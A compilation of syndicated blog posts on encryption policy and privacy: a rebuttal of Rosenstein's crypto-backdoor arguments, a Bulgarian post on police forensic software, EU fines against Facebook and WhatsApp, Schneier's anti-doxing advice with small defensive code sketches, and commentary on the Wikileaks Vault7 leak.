Likewise, the crypto backdoor Rosenstein is demanding for citizens doesn’t apply to the President, Congress, the NSA, the Army, or Rosenstein himself.

Then there are the natural barriers. The police can’t read your mind. They can only get the evidence that is there, like partial fingerprints, which are far less reliable than full fingerprints. They can’t go backwards in time.

I mention this because encryption is a natural barrier. It’s their job to overcome this barrier if they can, to crack crypto and so forth. It’s not our job to do it for them.

It’s like the camera that increasingly comes with TVs for video conferencing, or the microphone on Alexa-style devices that are always recording. These suddenly create evidence that the police want our help in gathering, such as having the camera turned on all the time, recording to disk, in case the police later get a warrant to peer backward in time at what happened in our living rooms. The “nothing is impervious” argument applies here as well. And it’s equally bogus here. By not helping the police by not recording our activities, we aren’t somehow breaking some long-standing tradition.

And this is the scary part. It’s not that we are breaking some ancient tradition that there’s no place the police can’t go (with a warrant). Instead, crypto backdoors break the tradition that never before have I been forced to help them eavesdrop on me, even before I’m a suspect, even before any crime has been committed. Sure, laws like CALEA force the phone companies to help the police against wrongdoers — but here Rosenstein is insisting I help the police against myself.

Balance between privacy and public safety

Rosenstein repeats the frequent claim that encryption upsets the balance between privacy and public safety:

Warrant-proof encryption defeats the constitutional balance by elevating privacy above public safety.

This is laughable, because technology has swung the balance alarmingly in favor of law enforcement. Far from “Going Dark” as his side claims, the problem we are confronted with is “Going Light”, where the police state monitors our every action.

You are surrounded by recording devices. If you walk down the street in town, outdoor surveillance cameras feed police facial recognition systems. If you drive, automated license plate readers can track your route. If you make a phone call or use a credit card, the police get a record of the transaction. If you stay in a hotel, they demand your ID, for law enforcement purposes.

And that’s their stuff, which is nothing compared to your stuff. You are never far from a recording device you own, such as your mobile phone, TV, Alexa/Siri/OkGoogle device, laptop. Modern cars from the last few years increasingly have always-on cell connections and data recorders that record your every action (and location).

Even if you hike out into the country, when you get back, the FBI can subpoena your GPS device to track down your hidden weapons cache, or grab the photos from your camera.

And this is all offline. So much of what we do is now online. Of the photographs you own, fewer than 1% are printed out; the rest are on your computer or backed up to the cloud.

Your phone is also a GPS recorder of your exact position all the time, which, if the government wins the Carpenter case, the police can grab without a warrant. Tagging all citizens with a recording device of their position is not “balance” but the premise for a novel more dystopian than 1984.

If suspected of a crime, which would you rather the police searched? Your person, houses, papers, and physical effects? Or your mobile phone, computer, email, and online/cloud accounts?

The balance of privacy and safety has swung so far in favor of law enforcement that rather than debating whether they should have crypto backdoors, we should be debating how to add more privacy protections.

“But it’s not conclusive”

Rosenstein defends the “going light” (“Golden Age of Surveillance”) by pointing out it’s not always enough for conviction. Nothing secures a conviction better than a person’s own words admitting to the crime, captured by surveillance. This other data, while copious, often fails to convince a jury beyond a reasonable doubt.

This is nonsense. Police got along well enough before the digital age, before such widespread messaging. They solved terrorist and child abduction cases just fine in the 1980s. Sure, somebody’s GPS location isn’t by itself enough — until you go there and find all the buried bodies, which leads to a conviction. “Going dark” imagines that somehow, the evidence they’ve been gathering for centuries is going away. It isn’t. It’s still here, and matches up with even more digital evidence.

Conversely, a person’s own words are not as conclusive as you think. There’s always missing context. We quickly get back to the Richelieu “six lines” problem, where captured communications are twisted to convict people, with defense lawyers trying to untwist them.

Rosenstein’s claim may be true, that a lot of criminals will go free because the other electronic data isn’t convincing enough. But I’d need to see that claim backed up with hard studies, not thrown out for emotional impact.

Terrorists and child molesters

You can always tell the lack of seriousness of law enforcement when they bring up terrorists and child molesters.

To be fair, sometimes we do need to talk about terrorists. There are things unique to terrorism where we may need to give government explicit powers to address those unique concerns. For example, the NSA buys mobile phone 0day exploits in order to hack terrorist leaders in tribal areas. This is a good thing.

But when terrorists use encryption the same way everyone else does, then it’s not a unique reason to sacrifice our freedoms to give the police extra powers. Either it’s a good idea for all crimes or no crimes — there’s nothing particular about terrorism that makes it an exceptional crime. Dead people are dead. Any rational view of the problem relegates terrorism to be a minor problem. More citizens have died since September 11, 2001 from their own furniture than from terrorism. According to studies, the hot water from the tap is more of a threat to you than terrorists.

Yes, government should do what it can to protect us from terrorists, but no, the threat is not so bad that it requires the imposition of a military/police state. When people use terrorism to justify their actions, it’s because they are trying to form a military/police state.

A similar argument works with child porn. Here’s the thing: the pervs aren’t exchanging child porn using the services Rosenstein wants to backdoor, like Apple’s Facetime or Facebook’s WhatsApp. Instead, they are exchanging child porn using custom services they build themselves.

Again, I’m (mostly) on the side of the FBI. I support their idea of buying 0day exploits in order to hack the web browsers of visitors to the secret “PlayPen” site. This is something that’s narrowly targeted to this problem and doesn’t endanger the innocent. On the other hand, their calls for crypto backdoors endanger the innocent while doing effectively nothing to address child porn.

Terrorists and child molesters are a clichéd, non-serious excuse to appeal to our emotions to give up our rights. We should not give in to such emotions.

Definition of “backdoor”

Rosenstein claims that we shouldn’t call backdoors “backdoors”:

No one calls any of those functions [like key recovery] a “back door.”  In fact, those capabilities are marketed and sought out by many users.

He’s partly right in that we rarely refer to PGP’s key escrow feature as a “backdoor”.

But that’s because the term “backdoor” refers less to how it’s done and more to who is doing it. If I set up a recovery password with Apple, I’m the one doing it to myself, so we don’t call it a backdoor. If it’s the police, spies, hackers, or criminals, then we call it a “backdoor” — even if it’s identical technology.

Wikipedia uses the key escrow feature of the 1990s Clipper Chip as a prime example of what everyone means by “backdoor”. By “no one”, Rosenstein is including Wikipedia, which is obviously incorrect.
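
The point that it can be identical technology is worth seeing concretely. In this sketch (my own, using the Python cryptography package; the key names are invented), the session key is simply wrapped a second time for a second keyholder. Whether that keyholder is your own backup service or the police is a question of policy, not of technology:

```python
# Key escrow in miniature: the message key is encrypted once for the
# recipient and once more for whoever holds the escrow key.
import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa

recipient_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
escrow_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)

OAEP = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)

session_key = os.urandom(32)  # the symmetric key that encrypts the message

# Normal operation: wrap the session key for the intended recipient.
for_recipient = recipient_key.public_key().encrypt(session_key, OAEP)

# Escrow (or backdoor): the identical operation, for the second keyholder.
for_escrow = escrow_key.public_key().encrypt(session_key, OAEP)

assert escrow_key.decrypt(for_escrow, OAEP) == session_key
```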

Though in truth, it’s not going to be the same technology. The needs of law enforcement are different than my personal key escrow/backup needs. In particular, there are unsolvable problems, such as a backdoor that works for the “legitimate” law enforcement in the United States but not for the “illegitimate” police states like Russia and China.

I feel for Rosenstein, because the term “backdoor” does have a pejorative connotation, which can be considered unfair. But that’s like saying the word “murder” is a pejorative term for killing people, or “torture” is a pejorative term for torture. The bad connotation exists because we don’t like government surveillance. I mean, honestly calling this feature “government surveillance feature” is likewise pejorative, and likewise exactly what it is that we are talking about.

Providers

Rosenstein focuses his arguments on “providers”, like Snapchat or Apple. But this isn’t the question.

The question is whether a “provider” like Telegram, a Russian company beyond US law, provides this feature. Or, by extension, whether individuals should be free to install whatever software they want, regardless of provider.

Telegram is a Russian company that provides end-to-end encryption. Anybody can download their software in order to communicate so that American law enforcement can’t eavesdrop. They aren’t going to put in a backdoor for the U.S. If we succeed in putting backdoors in Apple and WhatsApp, all this means is that criminals are going to install Telegram.

If, for some reason, the US is able to convince all such providers (including Telegram) to install a backdoor, then it still doesn’t solve the problem, as users can just build their own end-to-end encryption app that has no provider. It’s like email: some use major providers like GMail; others set up their own email server.

Ultimately, this means that any law mandating “crypto backdoors” is going to target users not providers. Rosenstein tries to make a comparison with what plain-old telephone companies have to do under old laws like CALEA, but that’s not what’s happening here. Instead, for such rules to have any effect, they have to punish users for what they install, not providers.

This continues the argument I made above. Government backdoors are not something that forces Internet services to eavesdrop on us — they force us to help the government spy on ourselves.

Rosenstein tries to address this by pointing out that it’s still a win if major providers like Apple’s Facetime and Facebook’s WhatsApp are forced to add backdoors, because they are the most popular, and some terrorists/criminals won’t move to alternate platforms. This is false. People with good intentions, who are unfairly targeted by a police state, the ones where police abuse is rampant, are the ones who use the backdoored products. Those with bad intentions, who know they are guilty, will move to the safe products. Indeed, Telegram is already popular among terrorists because they believe American services are already all backdoored.

Rosenstein is essentially demanding that the innocent get backdoored while the guilty don’t. This seems backwards. This is backwards.

Apple is morally weak

The reason I’m writing this post is that Rosenstein makes a few claims that cannot be ignored. One of them is how he explains Apple’s response to government insistence on weakening encryption: doing the opposite and strengthening it. He reasons this happens because:

Of course they [Apple] do. They are in the business of selling products and making money. 

We [the DoJ] use a different measure of success. We are in the business of preventing crime and saving lives. 

He swells with self-importance. His condescending tone ennobles himself while debasing others. But this isn’t how things work. He’s not some white knight above the peasantry, protecting us. He’s a beat cop, a civil servant, who serves us.

A better phrasing would have been:

They are in the business of giving customers what they want.

We are in the business of giving voters what they want.

Both sides are doing the same thing: giving people what they want. Yes, voters want safety, but they also want privacy. Rosenstein imagines that he’s free to ignore our demands for privacy as long as he’s fulfilling his duty to protect us. He has explicitly rejected what people want: “we use a different measure of success”. He imagines it’s his job to tell us where the balance between privacy and safety lies. That’s not his job; that’s our job. We, the people (and our representatives), make that decision, and it’s his job to do what he’s told. His measure of success is how well he fulfills our wishes, not how well he satisfies his imagined criteria.

That’s why those of us on this side of the debate doubt the good intentions of those like Rosenstein. He criticizes Apple for wanting to protect our rights and freedoms, and declares that his side measures success differently.

They are willing to be vile

Rosenstein makes this argument:

Companies are willing to make accommodations when required by the government. Recent media reports suggest that a major American technology company developed a tool to suppress online posts in certain geographic areas in order to embrace a foreign government’s censorship policies. 

Let me translate this for you:

Companies are willing to acquiesce to vile requests made by police-states. Therefore, they should acquiesce to our vile police-state requests.

What Rosenstein is admitting here is that his requests are those of a police state.

Constitutional Rights

Rosenstein says:

There is no constitutional right to sell warrant-proof encryption.

Maybe. It’s something the courts will have to decide. There are many 1st, 2nd, 3rd, 4th, and 5th Amendment issues here.

The reason we have the Bill of Rights is because of the abuses of the British Government. For example, they quartered troops in our homes, as a way of punishing us, and as a way of forcing us to help in our own oppression. The troops weren’t there to defend us against the French, but to defend us against ourselves, to shoot us if we got out of line.

And that’s what crypto backdoors do. We are forced to be agents of our own oppression. The principles Rosenstein enumerates apply to a wide range of additional surveillance. With little change, his speech could equally argue that the constant TV video surveillance from 1984 should be made law.

Let’s go back and look at Apple. It is not some base company exploiting consumers for profit. Apple doesn’t have guns; it cannot make people buy its product. If Apple doesn’t provide customers what they want, then customers vote with their feet and go buy an Android phone. Apple isn’t providing encryption/security in order to make a profit — it’s giving customers what they want in order to stay in business.

Conversely, if we citizens don’t like what the government does, tough luck: they’ve got the guns to enforce their edicts. We can’t easily vote with our feet and walk to another country. A “democracy” is far less democratic than capitalism. Apple is a minority, selling phones to 45% of the population, and that’s fine; the minority get the phones they want. In a democracy, where citizens vote on the issue, those 45% are screwed, as the 55% impose their unwanted will onto the remainder.

That’s why we have the Bill of Rights, to protect the 49% against abuse by the 51%. Regardless of whether the Supreme Court agrees that the current Constitution contains such a right, it is the sort of right that should exist no matter what the Constitution says.

Obliged to speak the truth

Here is another part of his speech that I feel cannot be ignored. We have to discuss this:

Those of us who swear to protect the rule of law have a different motivation.  We are obliged to speak the truth.

The truth is that “going dark” threatens to disable law enforcement and enable criminals and terrorists to operate with impunity.

This is not true. Sure, he’s obliged to tell the absolute truth in court. He’s also obliged to be truthful in general about facts in his personal life, such as not lying on his tax return (the sort of thing that can get lawyers disbarred).

But he’s not obliged to tell his spouse his honest opinion whether that new outfit makes them look fat. Likewise, Rosenstein knows his opinion on public policy doesn’t fall into this category. He can say with impunity that either global warming doesn’t exist, or that it’ll cause a biblical deluge within 5 years. Both are factually untrue, but it’s not going to get him fired.

And this particular claim is also exaggerated bunk. While everyone agrees encryption makes law enforcement's job harder than it would be with backdoors, nobody honestly believes it can "disable" law enforcement. While everyone agrees that encryption helps terrorists, nobody believes it can enable them to act with "impunity".

I feel bad here. It's a terrible thing to question your opponent's character this way. But Rosenstein made this unavoidable when he clearly, with no ambiguity, put his integrity as Deputy Attorney General on the line behind the statement that "going dark threatens to disable law enforcement and enable criminals and terrorists to operate with impunity". I feel it's a bald-faced lie, but you don't need to take my word for it. Read his own words yourself and judge his integrity.

Conclusion

Rosenstein’s speech includes repeated references to ideas like “oath”, “honor”, and “duty”. It reminds me of Col. Jessup’s speech in the movie “A Few Good Men”.

If you'll recall, it was a rousing speech: "you want me on that wall" and "you use words like honor as a punchline". Of course, since he was violating his oath and sending two privates to death row in order to avoid being held accountable, it was Jessup himself who was crapping on the concepts of "honor", "oath", and "duty".

And so is Rosenstein. He imagines himself on that wall, doing admittedly terrible things, justified by his duty to protect citizens. He imagines that it's he who is honorable while the rest of us are not, even as he utters bald-faced lies to further his own power and authority.

We activists oppose crypto backdoors not because we lack honor, or because we are criminals, or because we support terrorists and child molesters. It's because we value privacy and fear government officials who become corrupted by power. It's not that we fear Trump becoming a dictator; it's that we fear bureaucrats at Rosenstein's level becoming drunk on authority, which Rosenstein demonstrably is. His speech is a long train of corrupt ideas pursuing the same object of despotism, a despotism we oppose.

In other words, we oppose crypto backdoors because they are not a tool of law enforcement, but a tool of despotism.

No, GDBOP Will Not Be Spying on Your Chats

Post Syndicated from Bozho original https://blog.bozho.net/blog/2851

A news story appeared the other day claiming that "GDBOP can now spy on Viber, Facebook, and Skype." Of course, this is not true. GDBOP (Bulgaria's General Directorate for Combating Organized Crime) will not be able to spy on anything. The article itself also notes that the tender specification does not make clear whether it concerns seized mobile devices or real-time monitoring of them. The headline, however, is loud and implies spying.

From the specification it is nonetheless fairly clear, and once we look at the winning software (Oxygen Forensic), entirely clear, that this is about extracting information from devices under the physical control of the investigating authorities (i.e., seized as evidence). The software allows extraction of contacts and messages (with what success rate is unclear, given that the FBI recently had considerable trouble extracting encrypted data from an iPhone).

Monitoring such communication without the device being physically in the authorities' hands is possible only if spyware is installed on it. Oxygen Forensics (as the name suggests) is not spyware. And installing spyware is, in essence, a special surveillance measure that requires a court order. So even if the courts were signing those off by the kilogram (as in Tsvetanov's time), mass surveillance is not possible. Moreover, there is no guarantee your phone would get infected, especially if you have good user hygiene. Also, spyware would not be bought through an open public procurement, if only because Apple and Google would immediately plug any security holes as soon as they learned the devices could be "spied on."

Reading messages "in flight," i.e., by intercepting the communication between the devices and the servers, is impossible, at least for the most popular applications. They all use an encrypted connection to the server, and some (such as Signal, WhatsApp, and Telegram) encrypt the connection "end to end": even the server through which the messages pass has no way to read what the messages say. Only the sender and the recipient can. Why is there no way? Because the mathematical problems underlying this encryption (or "ciphering") are unsolvable with modern computers (at least not within reasonable periods of time).
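
To make the end-to-end point concrete, here is a minimal Python sketch using the PyNaCl library. This is a toy illustration of public-key boxes, not the actual Signal protocol (which adds key ratcheting and much more); the names and message are made up:

    from nacl.public import Box, PrivateKey  # pip install pynacl

    # Each party generates a key pair; only the public halves ever travel.
    alice_key = PrivateKey.generate()
    bob_key = PrivateKey.generate()

    # Alice encrypts to Bob's public key using her own private key.
    ciphertext = Box(alice_key, bob_key.public_key).encrypt(b"meet at noon")

    # A relaying server sees only random-looking bytes. Only Bob (or Alice)
    # holds a private key that can open the box.
    plaintext = Box(bob_key, alice_key.public_key).decrypt(ciphertext)
    assert plaintext == b"meet at noon"

Recovering the plaintext without one of the private keys means solving the underlying elliptic-curve problem, which is exactly the kind of mathematical problem that is intractable for modern computers.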

Why I have to act as PR for GDBOP, instead of them clarifying the case with a press release, is another topic. But the topic of protecting privacy is important. From that point of view, it is great that the media are following it. From another, it is not good for the headline to be misinforming.

So: GDBOP will not be able to spy on our chats. Not that they wouldn't want to; they simply lack the technological means. But it is important that we watch both the procurements and the legislation, because over the years there has been more than one attempt to push provisions into the Electronic Communications Act that would let the authorities and security services obtain information from mobile and internet providers. So far these attempts have had little success, but they will continue, under the pretext of "national security."

In fact, last autumn amendments were passed to the Disaster Protection Act which were in practice amendments to the Electronic Communications Act, and which gave the fire service ("Fire Safety") the power to request traffic data in the case of a person in distress (for example, someone lost in the mountains). The amendments were passed under the fast-track procedure (within a single plenary sitting). At first glance there is no problem, since in such cases it could genuinely be life-saving for mobile operators to quickly hand over the last known location of a given SIM card. The question, as always, is whether this can be abused.

And finally, a recommendation: the most secure messaging applications are Signal and WhatsApp (which uses the same protocol as Signal), followed by Telegram and Viber (although there is some debate about those two: Telegram, Viber).

Facebook / WhatsApp: The European Commission Imposes a Fine under the Merger Regulation

Post Syndicated from nellyo original https://nellyo.wordpress.com/2017/05/18/facebook-whatsapp-%D0%B5%D0%BA-%D0%BD%D0%B0%D0%BB%D0%B0%D0%B3%D0%B0-%D0%B3%D0%BB%D0%BE%D0%B1%D0%B0-%D0%BF%D0%BE-%D1%80%D0%B5%D0%B3%D0%BB%D0%B0%D0%BC%D0%B5%D0%BD%D1%82%D0%B0-%D0%B7%D0%B0-%D1%81/

The European Commission has decided to fine Facebook 110 million euros for providing incorrect or misleading information about Facebook's acquisition of WhatsApp. According to Competition Commissioner Vestager, the Commission must be able to take decisions about the effects of mergers on competition in full knowledge of the precise facts.

This is the first time the Commission has fined a company for providing false or misleading information since the Merger Regulation entered into force in 2004. The EC's decision is unrelated to any privacy, data protection, or consumer protection issues that may arise around Facebook / WhatsApp, and to any procedures at the national level within the EU.

Under the Merger Regulation, the Commission can impose fines of up to 1% of the aggregate turnover of companies that intentionally or negligently provide it with incorrect or misleading information. In this case, false and misleading information was provided twice: in the 2014 merger notification form and in the response to a Commission request for information in 2016.

The media note that this is yet another technology giant the EC is dealing with, after Amazon and Apple, and with proceedings against Google still ongoing.

The EC's press release

Filed under: Digital, EU Law

EU: Facebook and Personal Data

Post Syndicated from nellyo original https://nellyo.wordpress.com/2017/05/17/%D0%B5%D1%81-facebook-%D0%B8-%D0%BB%D0%B8%D1%87%D0%BD%D0%B8%D1%82%D0%B5-%D0%B4%D0%B0%D0%BD%D0%BD%D0%B8/

Facebook has been fined 150,000 euros in France. The French data protection regulator CNIL found six violations, including the collection of user information for advertising "without legal basis." Tracking of users while they browse the web was also established. Users have no control over the use of their personal data, according to the regulator's statement of 16 May 2017.

The FT reports that the Belgian regulator has reached a similar position; that in the Netherlands, ads were found to be targeted according to users' declared sexual preferences; and that WhatsApp has been fined 3 million euros in Italy, because its terms of use required mandatory consent to data sharing with Facebook, the company that owns WhatsApp.

The French regulator is working jointly with the data protection regulators of the Netherlands, Germany, Belgium, Spain, and others.

Source: FT

Filed under: Digital, EU Law

The EC Steps Up Action against Facebook, Twitter, and Google

Post Syndicated from nellyo original https://nellyo.wordpress.com/2017/03/18/google-facebook/

At the end of last year, an article appeared in the New York Times with a telling headline: Forget AT&T. The Real Monopolies Are Google and Facebook.

The occasion was the proposed deal between AT&T and Time Warner; but if we are interested in media monopolies, we should look toward Silicon Valley, the New York Times wrote: the companies with a dominant position in the distribution of media content these days are Facebook, Google, Apple, and Amazon.

And this is not only about journalistic publications.

Lately, the European Commission has been taking actions worth noting both on the competition law front and on the consumer protection front:

  • As regards protection of competition, much has been written about Google in Europe; the theme is preferential treatment of its own products and services. For Facebook, the current topic is the WhatsApp deal.
  • But now there is also a second line of active measures: according to an announcement of 17 March 2017, the European Commission and the member states' consumer protection authorities are demanding that the companies running social media comply with EU consumer protection rules. This now touches Facebook, Twitter, and Google+.

Filed under: Digital, EU Law, Media Law

Defense against Doxing

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2017/03/defense_against.html

A decade ago, I wrote about the death of ephemeral conversation. As computers were becoming ubiquitous, some unintended changes happened, too. Before computers, what we said disappeared once we’d said it. Neither face-to-face conversations nor telephone conversations were routinely recorded. A permanent communication was something different and special; we called it correspondence.

The Internet changed this. We now chat by text message and e-mail, on Facebook and on Instagram. These conversations — with friends, lovers, colleagues, fellow employees — all leave electronic trails. And while we know this intellectually, we haven’t truly internalized it. We still think of conversation as ephemeral, forgetting that we’re being recorded and what we say has the permanence of correspondence.

That our data is used by large companies for psychological manipulation (we call this advertising) is well known. So is its use by governments for law enforcement and, depending on the country, social control. What made the news over the past year were demonstrations of how vulnerable all of this data is to hackers and the effects of having it hacked, copied, and then published online. We call this doxing.

Doxing isn’t new, but it has become more common. It’s been perpetrated against corporations, law firms, individuals, the NSA and — just this week — the CIA. It’s largely harassment and not whistleblowing, and it’s not going to change anytime soon. The data in your computer and in the cloud are, and will continue to be, vulnerable to hacking and publishing online. Depending on your prominence and the details of this data, you may need some new strategies to secure your private life.

There are two basic ways hackers can get at your e-mail and private documents. One way is to guess your password. That’s how hackers got their hands on personal photos of celebrities from iCloud in 2014.

How to protect yourself from this attack is pretty obvious. First, don’t choose a guessable password. This is more than not using “password1” or “qwerty”; most easily memorizable passwords are guessable. My advice is to generate passwords you have to remember by using either the XKCD scheme or the Schneier scheme, and to use large random passwords stored in a password manager for everything else.
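
As an illustration of the XKCD scheme, here is a minimal sketch in Python; the eight-word list is a toy stand-in, since a real diceware list has about 7,776 words:

    import secrets

    # Toy list for illustration; a real diceware list has about 7,776 words.
    WORDS = ["correct", "horse", "battery", "staple",
             "orbit", "velvet", "quartz", "meadow"]

    # secrets (unlike random) draws from the OS's cryptographic generator.
    passphrase = " ".join(secrets.choice(WORDS) for _ in range(5))
    print(passphrase)  # e.g. "quartz horse meadow staple orbit"

With a real-size list, five words drawn this way carry roughly 64 bits of entropy: memorable, yet far harder to guess than a typical human-chosen password.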

Second, turn on two-factor authentication where you can, like Google’s 2-Step Verification. This adds another step besides just entering a password, such as having to type in a one-time code that’s sent to your mobile phone. And third, don’t reuse the same password on any sites you actually care about.
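
Those one-time codes are typically TOTP (RFC 6238): an HMAC over the number of 30-second intervals since the epoch, truncated to six digits. A rough sketch using only Python's standard library follows; the base32 secret is a made-up example of the string a site shares with your phone at enrollment:

    import base64
    import hashlib
    import hmac
    import struct
    import time

    def totp(secret_b32, step=30, digits=6):
        # HMAC-SHA1 over the number of 30-second steps since the epoch.
        key = base64.b32decode(secret_b32, casefold=True)
        counter = struct.pack(">Q", int(time.time()) // step)
        digest = hmac.new(key, counter, hashlib.sha1).digest()
        # Dynamic truncation, per RFC 4226.
        offset = digest[-1] & 0x0F
        code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
        return str(code % 10 ** digits).zfill(digits)

    print(totp("JBSWY3DPEHPK3PXP"))  # made-up enrollment secret

Your phone and the server derive the same code independently from the shared secret and the clock, so a stolen password alone is not enough to log in.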

You’re not done, though. Hackers have accessed accounts by exploiting the “secret question” feature and resetting the password. That was how Sarah Palin’s e-mail account was hacked in 2008. The problem with secret questions is that they’re not very secret and not very random. My advice is to refuse to use those features. Type randomness into your keyboard, or choose a really random answer and store it in your password manager.
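
In practice, "type randomness" can be as simple as the following; the generated string becomes your "mother's maiden name" and lives only in your password manager:

    import secrets

    # A random "answer" with no connection to your actual history.
    answer = secrets.token_urlsafe(16)
    print(answer)  # e.g. "Jr2fQq0zW8xN5kHqVbungA"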

Finally, you also have to stay alert to phishing attacks, where a hacker sends you an enticing e-mail with a link that sends you to a web page that looks almost like the expected page, but which actually isn’t. This sort of thing can bypass two-factor authentication, and is almost certainly what tricked John Podesta and Colin Powell.

The other way hackers can get at your personal stuff is by breaking in to the computers the information is stored on. This is how the Russians got into the Democratic National Committee’s network and how a lone hacker got into the Panamanian law firm Mossack Fonseca. Sometimes individuals are targeted, as when China hacked Google in 2010 to access the e-mail accounts of human rights activists. Sometimes the whole network is the target, and individuals are inadvertent victims, as when thousands of Sony employees had their e-mails published by North Korea in 2014.

Protecting yourself is difficult, because it often doesn’t matter what you do. If your e-mail is stored with a service provider in the cloud, what matters is the security of that network and that provider. Most users have no control over that part of the system. The only way to truly protect yourself is to not keep your data in the cloud where someone could get to it. This is hard. We like the fact that all of our e-mail is stored on a server somewhere and that we can instantly search it. But that convenience comes with risk. Consider deleting old e-mail, or at least downloading it and storing it offline on a portable hard drive. In fact, storing data offline is one of the best things you can do to protect it from being hacked and exposed. If it’s on your computer, what matters is the security of your operating system and network, not the security of your service provider.
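
One low-tech way to do that downloading is IMAP plus a local mbox file, sketched below with Python's standard library. The host, account, and password are placeholders, and a real script would want error handling and incremental fetching:

    import email
    import imaplib
    import mailbox

    # Placeholder host and credentials; substitute your own provider's.
    conn = imaplib.IMAP4_SSL("imap.example.com")
    conn.login("user@example.com", "app-password")
    conn.select("INBOX", readonly=True)

    archive = mailbox.mbox("archive.mbox")  # the local, offline copy
    typ, data = conn.search(None, "ALL")
    for num in data[0].split():
        typ, msg_data = conn.fetch(num, "(RFC822)")
        archive.add(email.message_from_bytes(msg_data[0][1]))
    archive.flush()
    conn.logout()

Once archive.mbox sits on a portable drive, its exposure depends on your physical security rather than on a provider's network.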

Consider this for files on your own computer. The more things you can move offline, the safer you’ll be.

E-mail, no matter how you store it, is vulnerable. If you’re worried about your conversations becoming public, think about an encrypted chat program instead, such as Signal, WhatsApp or Off-the-Record Messaging. Consider using communications systems that don’t save everything by default.

None of this is perfect, of course. Portable hard drives are vulnerable when you connect them to your computer. There are ways to jump air gaps and access data on computers not connected to the Internet. Communications and data files you delete might still exist in backup systems somewhere — either yours or those of the various cloud providers you're using. And remember that there's always another copy of any of your conversations, stored with the person you're conversing with. Even with these caveats, though, these measures will make a big difference.

When secrecy is truly paramount, go back to communications systems that are still ephemeral. Pick up the telephone and talk. Meet face to face. We don’t yet live in a world where everything is recorded and everything is saved, although that era is coming. Enjoy the last vestiges of ephemeral conversation while you still can.

This essay originally appeared in the Washington Post.

Some comments on the Wikileaks CIA/#vault7 leak

Post Syndicated from Robert Graham original http://blog.erratasec.com/2017/03/some-comments-on-wikileaks-ciavault7.html

I thought I’d write up some notes about the Wikileaks CIA “#vault7” leak. This post will be updated frequently over the next 24 hours.

The CIA didn't remotely hack a TV. The docs are clear that they can update the software running on the TV using a USB drive. There's no evidence of them doing so remotely over the Internet. If you aren't afraid of the CIA breaking in and installing a listening device, then you shouldn't be afraid of the CIA installing listening software.

The CIA didn’t defeat Signal/WhatsApp encryption. The CIA has some exploits for Android/iPhone. If they can get on your phone, then of course they can record audio and screenshots. Technically, this bypasses/defeats encryption — but such phrases used by Wikileaks are highly misleading, since nothing related to Signal/WhatsApp is happening. What’s happening is the CIA is bypassing/defeating the phone. Sometimes. If they’ve got an exploit for it, or can trick you into installing their software.

There's no overlap or turf war with the NSA. The NSA does "signals intelligence", so they hack radios and remotely across the Internet. The CIA does "human intelligence", so they hack locally, with a human. The sort of thing they do is bribe, blackmail, or bedazzle some human "asset" (like a technician in a nuclear plant) to stick a USB drive into a slot. All the various military, law enforcement, and intelligence agencies have hacking groups to help them do their own missions.

The CIA isn’t more advanced than the NSA. Most of this dump is child’s play, simply malware/trojans cobbled together from bits found on the Internet. Sometimes they buy more advanced stuff from contractors, or get stuff shared from the NSA. Technologically, they are far behind the NSA in sophistication and technical expertise.

The CIA isn't hoarding 0days. For one thing, few 0days were mentioned at all. The CIA's techniques rely upon straightforward hacking, not super secret 0day hacking. Second of all, they aren't keeping 0days back in a vault somewhere; if they have 0days, they are using them.

The VEP process is nonsense. Activists keep mentioning the "vulnerability equities process", in which everyone within the government with an interest in 0days has a say in what happens to them, with the eventual goal that they be disclosed to vendors. The VEP is nonsense. The activist argument is nonsense. As far as I can tell, the VEP is designed as busy work to keep people away from those who really use 0days, such as the NSA and the CIA. If they spend millions of dollars buying 0days because they have that value in intelligence operations, they aren't going to destroy that value by disclosing them to a vendor. If the VEP forces disclosure, disclosure still won't happen; the NSA will simply stop buying vulns.

But they'll have to disclose the 0days. Any 0days that were leaked to Wikileaks are, of course, no longer secret. Thus, while this leak isn't an argument for unilateral disarmament in cyberspace, the CIA will have to disclose to vendors the vulns that are now in Russian hands, so that they can be fixed.

There are no false flags. In several places, the CIA talks about making sure that what they do isn't so unique that it can be attributed to them. However, Wikileaks's press release hints that the "UMBRAGE" program is deliberately stealing techniques from Russia to use as a false-flag operation. This is nonsense. For example, the DNC hack attribution was based on live command-and-control servers simultaneously used against different Russian targets, not a few snippets of code. [More here]

This hurts the CIA a lot. Already, one AV researcher has told me that a virus they once suspected came from the Russians or Chinese can now be attributed to the CIA, as it perfectly matches the description of something in the leak. We can develop anti-virus and intrusion-detection signatures based on this information that will defeat much of what we read in these documents. This would put a multi-year delay in the CIA's development efforts. Plus, the agency will now go on a witch-hunt looking for the leaker, which will erode morale. Update: Three extremely smart and knowledgeable people whom I respect disagree, claiming it won't hurt the CIA a lot. I suppose I'm focusing on hurting the CIA's cyber abilities, not the CIA as a whole, which is mostly non-cyber in function.

The CIA is not cutting edge. A few days ago, Hak5 started selling "BashBunny", a USB hacking tool more advanced than the USB tools in the leak. The CIA seems to get most of their USB techniques from open-source projects, such as Travis Goodspeed's "GoodFET" project.

The CIA isn’t spying on us. Snowden revealed how the NSA was surveilling all Americans. Nothing like that appears in the CIA dump. It’s all legitimate spy stuff (assuming you think spying on foreign adversaries is legitimate).

Update #2: How is hacking cars and phones not SIGINT (which is the NSA's turf)? The answer is physical access. For example, they might have a device that plugs into the OBD-II port on the car and quickly updates the firmware of the brakes. Think of it as normal spy activity (e.g. cutting a victim's brakes), but now with cyber.

Update #3: Apple iPhone. My vague sense is that CIA is more concerned about decrypting iPhones they get physical access to, rather than remotely hacking them and installing malware. CIA is HUMINT and covert ops, meaning they’ll punch somebody in the face, grab their iPhone, and run, then take it back to their lab and decrypt it.